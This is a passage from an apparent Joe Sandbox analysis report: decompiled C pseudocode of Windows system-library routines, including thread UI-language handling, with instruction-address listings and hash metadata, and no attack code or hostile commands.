										_t329 = E011251BE(_t284,  *((intOrPtr*)(_v48 + 0x108166c)), _a16, _t321, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t321;
									if( *_t293 == _t321) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t293) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
												_t329 = E010D2AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t254 = E010B6600( *(_t309 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E010D2C50(_t293, _a8, _t284, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t261 = E010D2AE4( &_v36, _a8, _t284, _a16, _a20, _t329);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E010D2C50(_v36, _a8, _t284, _a16, _a20, _t329, 1);
									}
									_v8 = _t321;
									E010D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t329;
					}
					L70:
					return E010FD0D1(_t247);
				}
				L108:
			}



















































                                          0x010d2584
                                          0x010d2586
                                          0x010d2590
                                          0x010d2596
                                          0x010d2597
                                          0x010d2598
                                          0x010d2599
                                          0x010d259e
                                          0x010d25a4
                                          0x010d25a9
                                          0x010d25ac
                                          0x010d25ae
                                          0x010d25b1
                                          0x010d25b2
                                          0x010d25b5
                                          0x010d25b8
                                          0x010d25bb
                                          0x010d25bc
                                          0x010d25bf
                                          0x010d25c2
                                          0x010d25c5
                                          0x010d25c6
                                          0x010d25cb
                                          0x010d25ce
                                          0x010d25d8
                                          0x010d25dd
                                          0x010d25de
                                          0x010d25e1
                                          0x010d25e3
                                          0x010d25e9
                                          0x010d26da
                                          0x010d26da
                                          0x010d26dd
                                          0x010d26e2
                                          0x01115b56
                                          0x00000000
                                          0x010d26e8
                                          0x010d26f9
                                          0x010d26fb
                                          0x010d26fe
                                          0x010d2700
                                          0x01115b60
                                          0x00000000
                                          0x010d2706
                                          0x010d2706
                                          0x010d270a
                                          0x010d270a
                                          0x010d270d
                                          0x010d2713
                                          0x010d2716
                                          0x010d2718
                                          0x010d271c
                                          0x010d271e
                                          0x01115b6c
                                          0x01115b6f
                                          0x01115b7f
                                          0x01115b89
                                          0x01115b8e
                                          0x01115b93
                                          0x01115b96
                                          0x01115b9c
                                          0x01115ba0
                                          0x01115ba3
                                          0x01115bab
                                          0x01115bb0
                                          0x01115bb3
                                          0x01115bb3
                                          0x01115ba3
                                          0x010d2724
                                          0x010d2726
                                          0x010d2729
                                          0x010d272c
                                          0x010d279d
                                          0x010d279d
                                          0x010d27a0
                                          0x010d27a2
                                          0x00000000
                                          0x010d272e
                                          0x010d272e
                                          0x010d2731
                                          0x010d2734
                                          0x010d2734
                                          0x010d2736
                                          0x01115bc1
                                          0x01115bc1
                                          0x01115bc4
                                          0x00000000
                                          0x01115bca
                                          0x01115bca
                                          0x01115bcd
                                          0x00000000
                                          0x01115bd3
                                          0x00000000
                                          0x01115bd3
                                          0x01115bcd
                                          0x010d273c
                                          0x010d273c
                                          0x010d2742
                                          0x010d2747
                                          0x010d274a
                                          0x010d274d
                                          0x010d2750
                                          0x00000000
                                          0x010d2756
                                          0x010d2756
                                          0x00000000
                                          0x010d2902
                                          0x010d2908
                                          0x010d290b
                                          0x00000000
                                          0x010d2911
                                          0x010d291c
                                          0x010d2921
                                          0x00000000
                                          0x010d2921
                                          0x00000000
                                          0x00000000
                                          0x010d2880
                                          0x010d2887
                                          0x010d288c
                                          0x00000000
                                          0x00000000
                                          0x010d2805
                                          0x010d280a
                                          0x010d2814
                                          0x010d2816
                                          0x00000000
                                          0x00000000
                                          0x010d281e
                                          0x010d2821
                                          0x010d2823
                                          0x00000000
                                          0x010d2829
                                          0x010d2829
                                          0x010d2831
                                          0x010d283c
                                          0x010d283e
                                          0x00000000
                                          0x010d283e
                                          0x00000000
                                          0x00000000
                                          0x010d284e
                                          0x010d2850
                                          0x010d2851
                                          0x010d2854
                                          0x010d2857
                                          0x010d285a
                                          0x010d285c
                                          0x010d285d
                                          0x00000000
                                          0x00000000
                                          0x010d275d
                                          0x010d2761
                                          0x00000000
                                          0x010d2767
                                          0x010d276e
                                          0x010d2773
                                          0x010d2773
                                          0x010d2776
                                          0x010d2778
                                          0x010d277e
                                          0x010d277e
                                          0x010d2781
                                          0x010d2781
                                          0x010d2783
                                          0x010d2784
                                          0x00000000
                                          0x00000000
                                          0x01115bd8
                                          0x01115bde
                                          0x01115be4
                                          0x01115be6
                                          0x01115be8
                                          0x01115be9
                                          0x01115bee
                                          0x01115bf8
                                          0x01115bff
                                          0x01115c01
                                          0x01115c04
                                          0x01115c07
                                          0x01115c0b
                                          0x01115c0d
                                          0x01115c0d
                                          0x01115c15
                                          0x01115c18
                                          0x01115c1b
                                          0x01115c1b
                                          0x01115c1e
                                          0x00000000
                                          0x00000000
                                          0x010d28c3
                                          0x010d28c8
                                          0x010d28d2
                                          0x010d28d4
                                          0x010d28d8
                                          0x010d28db
                                          0x01115c26
                                          0x01115c28
                                          0x01115c2d
                                          0x01115c2d
                                          0x00000000
                                          0x00000000
                                          0x01115c34
                                          0x01115c36
                                          0x01115c49
                                          0x01115c4e
                                          0x01115c54
                                          0x01115c5b
                                          0x01115c5d
                                          0x01115c60
                                          0x010d2788
                                          0x010d2788
                                          0x010d278b
                                          0x010d278e
                                          0x010d278e
                                          0x010d278e
                                          0x010d2791
                                          0x00000000
                                          0x00000000
                                          0x010d2756
                                          0x010d2750
                                          0x00000000
                                          0x010d2794
                                          0x010d2794
                                          0x010d2795
                                          0x010d2798
                                          0x010d2798
                                          0x00000000
                                          0x010d2734
                                          0x010d272c
                                          0x010d2700
                                          0x010d25ef
                                          0x010d25ef
                                          0x010d25ef
                                          0x010d25f2
                                          0x010d25f8
                                          0x00000000
                                          0x00000000
                                          0x010d25fe
                                          0x00000000
                                          0x010d28e6
                                          0x010d28ec
                                          0x010d28ef
                                          0x010d28f5
                                          0x010d28f8
                                          0x010d28f8
                                          0x00000000
                                          0x010d28f8
                                          0x00000000
                                          0x00000000
                                          0x010d2866
                                          0x010d2866
                                          0x010d2876
                                          0x010d2879
                                          0x00000000
                                          0x00000000
                                          0x010d27e0
                                          0x010d27e7
                                          0x010d27e9
                                          0x010d27eb
                                          0x01115afd
                                          0x00000000
                                          0x01115afd
                                          0x00000000
                                          0x00000000
                                          0x010d2633
                                          0x010d2638
                                          0x010d263b
                                          0x010d263c
                                          0x010d263e
                                          0x010d2640
                                          0x010d2642
                                          0x010d2647
                                          0x010d2649
                                          0x010d264e
                                          0x010d2650
                                          0x010d2653
                                          0x010d2659
                                          0x010d26a2
                                          0x010d26a7
                                          0x010d26ac
                                          0x010d26b2
                                          0x01115b11
                                          0x01115b15
                                          0x01115b17
                                          0x00000000
                                          0x010d26b8
                                          0x010d26b8
                                          0x010d26ba
                                          0x010d27a6
                                          0x010d27a6
                                          0x010d27a9
                                          0x010d27ab
                                          0x010d27b9
                                          0x010d27b9
                                          0x010d27be
                                          0x010d27c1
                                          0x010d27c3
                                          0x010d27c5
                                          0x010d27c7
                                          0x01115c74
                                          0x01115c79
                                          0x01115c79
                                          0x010d27c7
                                          0x00000000
                                          0x010d26c0
                                          0x010d26c0
                                          0x010d26c3
                                          0x010d26c6
                                          0x010d26c6
                                          0x010d26c9
                                          0x010d26c9
                                          0x00000000
                                          0x010d26c9
                                          0x010d26ba
                                          0x010d265b
                                          0x010d265b
                                          0x010d265e
                                          0x010d2667
                                          0x010d266d
                                          0x010d2677
                                          0x010d267c
                                          0x010d267f
                                          0x010d2681
                                          0x01115b49
                                          0x01115b4e
                                          0x010d27cd
                                          0x010d27d0
                                          0x010d27d1
                                          0x010d27d2
                                          0x010d27d4
                                          0x010d27dd
                                          0x010d2687
                                          0x010d2687
                                          0x010d268a
                                          0x010d268b
                                          0x010d268e
                                          0x010d268f
                                          0x010d2691
                                          0x010d2696
                                          0x010d2698
                                          0x010d269d
                                          0x010d269f
                                          0x00000000
                                          0x010d269f
                                          0x010d2681
                                          0x00000000
                                          0x00000000
                                          0x010d2846
                                          0x00000000
                                          0x00000000
                                          0x010d2605
                                          0x010d260a
                                          0x010d260c
                                          0x010d2611
                                          0x010d2616
                                          0x010d2619
                                          0x010d2619
                                          0x010d261e
                                          0x00000000
                                          0x010d2624
                                          0x010d2627
                                          0x010d2627
                                          0x00000000
                                          0x00000000
                                          0x01115b1f
                                          0x00000000
                                          0x00000000
                                          0x010d2894
                                          0x010d289b
                                          0x010d289d
                                          0x010d28a1
                                          0x01115b2b
                                          0x01115b2e
                                          0x01115b2e
                                          0x010d28a7
                                          0x010d28a9
                                          0x01115b04
                                          0x01115b09
                                          0x01115b09
                                          0x01115b09
                                          0x00000000
                                          0x00000000
                                          0x01115b35
                                          0x01115b3c
                                          0x010d28fb
                                          0x010d28fb
                                          0x010d26cc
                                          0x010d26cc
                                          0x010d26d0
                                          0x00000000
                                          0x010d26d2
                                          0x010d26d2
                                          0x00000000
                                          0x010d26d2
                                          0x00000000
                                          0x00000000
                                          0x010d25fe
                                          0x010d292d
                                          0x010d292f
                                          0x010d2930
                                          0x010d2935
                                          0x010d293e
                                          0x010d293f
                                          0x010d2944
                                          0x010d294c
                                          0x010d294f
                                          0x010d2952
                                          0x010d2958
                                          0x010d295a
                                          0x010d2960
                                          0x010d2962
                                          0x010d2968
                                          0x010d2972
                                          0x010d2973
                                          0x010d297c
                                          0x010d297e
                                          0x010d297f
                                          0x010d2980
                                          0x010d2981
                                          0x010d2982
                                          0x010d2983
                                          0x010d2984
                                          0x010d2985
                                          0x010d2986
                                          0x010d2987
                                          0x010d2988
                                          0x010d2989
                                          0x010d298a
                                          0x010d298b
                                          0x010d298c
                                          0x010d298d
                                          0x010d298e
                                          0x010d298f
                                          0x010d2990
                                          0x010d2992
                                          0x010d2997
                                          0x010d29a3
                                          0x010d29a6
                                          0x010d29ab
                                          0x010d29ad
                                          0x010d29b0
                                          0x010d29b2
                                          0x01115c80
                                          0x010d29b8
                                          0x010d29b8
                                          0x010d29bb
                                          0x010d29c0
                                          0x010d29c5
                                          0x010d29c6
                                          0x010d29c6
                                          0x010d29c9
                                          0x010d29cb
                                          0x00000000
                                          0x00000000
                                          0x010d29cd
                                          0x010d29d0
                                          0x010d29d9
                                          0x010d29db
                                          0x010d29dd
                                          0x010d2a7f
                                          0x010d2a84
                                          0x010d2a87
                                          0x010d2a89
                                          0x01115ca1
                                          0x01115ca3
                                          0x00000000
                                          0x010d2a8f
                                          0x010d2a8f
                                          0x00000000
                                          0x010d2a8f
                                          0x00000000
                                          0x010d29e3
                                          0x010d29e3
                                          0x010d29e3
                                          0x00000000
                                          0x010d29e3
                                          0x010d29dd
                                          0x00000000
                                          0x010d29db
                                          0x010d29e6
                                          0x010d29e9
                                          0x010d29eb
                                          0x010d29ed
                                          0x010d29f3
                                          0x010d29f5
                                          0x010d29f8
                                          0x010d29fa
                                          0x010d2a97
                                          0x010d2a9a
                                          0x010d2a9d
                                          0x010d2add
                                          0x00000000
                                          0x010d2a9f
                                          0x010d2aa2
                                          0x010d2aa5
                                          0x010d2aa8
                                          0x010d2aab
                                          0x01115cab
                                          0x01115caf
                                          0x01115cc5
                                          0x01115cda
                                          0x01115cdc
                                          0x01115cdf
                                          0x01115ce5
                                          0x00000000
                                          0x01115ceb
                                          0x01115ced
                                          0x01115cee
                                          0x00000000
                                          0x01115cee
                                          0x01115cb1
                                          0x01115cb4
                                          0x01115cb9
                                          0x01115cbb
                                          0x00000000
                                          0x01115cbd
                                          0x01115cbd
                                          0x00000000
                                          0x01115cbd
                                          0x01115cbb
                                          0x010d2ab1
                                          0x010d2ab1
                                          0x010d2ac4
                                          0x010d2ac6
                                          0x010d2ac6
                                          0x00000000
                                          0x010d2ac6
                                          0x010d2aab
                                          0x00000000
                                          0x010d2a00
                                          0x010d2a09
                                          0x010d2a0e
                                          0x010d2a21
                                          0x010d2a24
                                          0x010d2a35
                                          0x010d2a3a
                                          0x010d2a3d
                                          0x010d2a42
                                          0x010d2a59
                                          0x010d2a59
                                          0x010d2a5c
                                          0x010d2a5f
                                          0x010d2a5f
                                          0x010d29fa
                                          0x010d29f3
                                          0x010d2a64
                                          0x010d2a64
                                          0x010d2a6b
                                          0x010d2a6b
                                          0x010d2a6d
                                          0x010d2a72
                                          0x010d2a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: d0214ca0100b2fdaa5fb91171e37d7ae9554cf318d5970ae60b26d2e104adf08
                                          • Instruction ID: 39d88a4f18a851da5ce5aff059e5c03c5c795fcdd44cd2136d0bf29e21dc516e
                                          • Opcode Fuzzy Hash: d0214ca0100b2fdaa5fb91171e37d7ae9554cf318d5970ae60b26d2e104adf08
                                          • Instruction Fuzzy Hash: A4C18D71E10319DBDB29DFA9D880BEEBBF1FF89700F054029E991AB250D734A941CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E010DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E010BEEF0(0x1197b60);
					_t134 =  *0x1197b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1197b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1197b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E010B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E010B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01148938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E010AB150();
													}
													_t116 = E01146D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E010B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1198638; // 0x0
																	_t122 = L010B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E010B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E010B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L010DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L010B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E010DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E010DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E010DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E010DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E010DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1197b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1197b84 = _t75;
						_t73 = E010BEB70(_t134, 0x1197b60);
						if( *0x1197b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E010BFF60( *0x1197b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                          0x010dfab0
                                          0x010dfab2
                                          0x010dfab3
                                          0x010dfab4
                                          0x010dfabc
                                          0x010dfac0
                                          0x010dfb14
                                          0x010dfb17
                                          0x010dfac2
                                          0x010dfac8
                                          0x010dfacd
                                          0x010dfad3
                                          0x010dfad3
                                          0x010dfadd
                                          0x010dfb18
                                          0x010dfb1b
                                          0x010dfb1d
                                          0x010dfb1e
                                          0x010dfb1f
                                          0x010dfb20
                                          0x010dfb21
                                          0x010dfb22
                                          0x010dfb23
                                          0x010dfb24
                                          0x010dfb25
                                          0x010dfb26
                                          0x010dfb27
                                          0x010dfb28
                                          0x010dfb29
                                          0x010dfb2a
                                          0x010dfb2b
                                          0x010dfb2c
                                          0x010dfb2d
                                          0x010dfb2e
                                          0x010dfb2f
                                          0x010dfb3a
                                          0x010dfb3b
                                          0x010dfb3e
                                          0x010dfb41
                                          0x010dfb44
                                          0x010dfb47
                                          0x010dfb4a
                                          0x010dfb4d
                                          0x010dfb53
                                          0x0111bdcb
                                          0x0111bdcb
                                          0x010dfb59
                                          0x010dfb5b
                                          0x010dfb5b
                                          0x010dfb5e
                                          0x0111bdd5
                                          0x0111bdd8
                                          0x00000000
                                          0x0111bdda
                                          0x00000000
                                          0x0111bdda
                                          0x010dfb64
                                          0x010dfb64
                                          0x010dfb64
                                          0x010dfb67
                                          0x010dfb6e
                                          0x010dfb70
                                          0x010dfb72
                                          0x00000000
                                          0x010dfb78
                                          0x010dfb7a
                                          0x010dfb7a
                                          0x010dfb7d
                                          0x010dfb80
                                          0x0111bddf
                                          0x0111bde1
                                          0x00000000
                                          0x0111bde3
                                          0x00000000
                                          0x0111bde3
                                          0x010dfb86
                                          0x010dfb86
                                          0x010dfb86
                                          0x010dfb8b
                                          0x010dfb90
                                          0x010dfb92
                                          0x010dfb94
                                          0x010dfb9a
                                          0x010dfb9b
                                          0x010dfba1
                                          0x0111bde8
                                          0x0111bdeb
                                          0x0111bded
                                          0x0111beb5
                                          0x0111beb5
                                          0x0111bebb
                                          0x0111bebd
                                          0x0111bec3
                                          0x0111bed2
                                          0x0111bedd
                                          0x0111bedd
                                          0x0111beed
                                          0x00000000
                                          0x0111bdf3
                                          0x0111bdfe
                                          0x0111be06
                                          0x0111be0b
                                          0x0111be0d
                                          0x0111be0f
                                          0x0111be14
                                          0x0111be19
                                          0x0111be20
                                          0x0111be25
                                          0x0111be27
                                          0x0111be35
                                          0x0111be39
                                          0x0111be46
                                          0x0111be4f
                                          0x0111be54
                                          0x0111be56
                                          0x0111bef8
                                          0x0111bef8
                                          0x00000000
                                          0x0111be5c
                                          0x0111be5c
                                          0x0111be60
                                          0x00000000
                                          0x0111be66
                                          0x0111be66
                                          0x0111be7f
                                          0x0111be84
                                          0x0111be87
                                          0x0111be89
                                          0x0111be8b
                                          0x0111be99
                                          0x0111be9d
                                          0x0111bea0
                                          0x0111beac
                                          0x0111beaf
                                          0x0111beb1
                                          0x0111beb3
                                          0x0111beb3
                                          0x00000000
                                          0x0111bea2
                                          0x0111bea2
                                          0x00000000
                                          0x0111bea2
                                          0x0111be8d
                                          0x0111be8d
                                          0x0111be92
                                          0x00000000
                                          0x0111be92
                                          0x0111be8b
                                          0x0111be60
                                          0x0111be3b
                                          0x0111be3b
                                          0x0111be3e
                                          0x00000000
                                          0x0111be40
                                          0x0111be40
                                          0x0111be44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111be44
                                          0x0111be3e
                                          0x0111be29
                                          0x0111be29
                                          0x00000000
                                          0x0111be29
                                          0x0111be27
                                          0x00000000
                                          0x010dfba7
                                          0x010dfba7
                                          0x010dfbab
                                          0x0111bf02
                                          0x010dfbb1
                                          0x010dfbb1
                                          0x010dfbb8
                                          0x010dfbbd
                                          0x010dfbbd
                                          0x010dfbbf
                                          0x010dfbbf
                                          0x010dfbc5
                                          0x010dfbcb
                                          0x010dfbf8
                                          0x010dfbf8
                                          0x010dfbfa
                                          0x00000000
                                          0x010dfc00
                                          0x010dfc00
                                          0x010dfc03
                                          0x00000000
                                          0x010dfc09
                                          0x010dfc09
                                          0x010dfc0f
                                          0x010dfc15
                                          0x010dfc23
                                          0x010dfc23
                                          0x010dfc25
                                          0x010dfc27
                                          0x010dfc75
                                          0x010dfc7c
                                          0x010dfc84
                                          0x00000000
                                          0x010dfc29
                                          0x010dfc29
                                          0x010dfc2d
                                          0x010dfc30
                                          0x0111bf0f
                                          0x00000000
                                          0x010dfc36
                                          0x010dfc38
                                          0x010dfc3b
                                          0x010dfc41
                                          0x0111bf17
                                          0x0111bf19
                                          0x0111bf48
                                          0x0111bf4b
                                          0x00000000
                                          0x0111bf1b
                                          0x0111bf22
                                          0x0111bf24
                                          0x0111bf26
                                          0x00000000
                                          0x0111bf2c
                                          0x0111bf37
                                          0x0111bf39
                                          0x0111bf3b
                                          0x00000000
                                          0x0111bf41
                                          0x0111bf41
                                          0x0111bf41
                                          0x0111bf41
                                          0x0111bf45
                                          0x00000000
                                          0x0111bf45
                                          0x0111bf3b
                                          0x0111bf26
                                          0x00000000
                                          0x010dfc47
                                          0x010dfc47
                                          0x010dfc49
                                          0x010dfcb2
                                          0x010dfcb4
                                          0x010dfcb6
                                          0x010dfcdc
                                          0x010dfcdc
                                          0x00000000
                                          0x010dfcb8
                                          0x010dfcc3
                                          0x010dfcc5
                                          0x010dfcc7
                                          0x00000000
                                          0x010dfcc9
                                          0x010dfcc9
                                          0x010dfccd
                                          0x00000000
                                          0x010dfccd
                                          0x010dfcc7
                                          0x00000000
                                          0x010dfc4b
                                          0x010dfc4b
                                          0x010dfc4e
                                          0x010dfc4e
                                          0x010dfc51
                                          0x010dfc51
                                          0x010dfc54
                                          0x010dfc5a
                                          0x010dfc5c
                                          0x010dfc5f
                                          0x010dfc61
                                          0x010dfc63
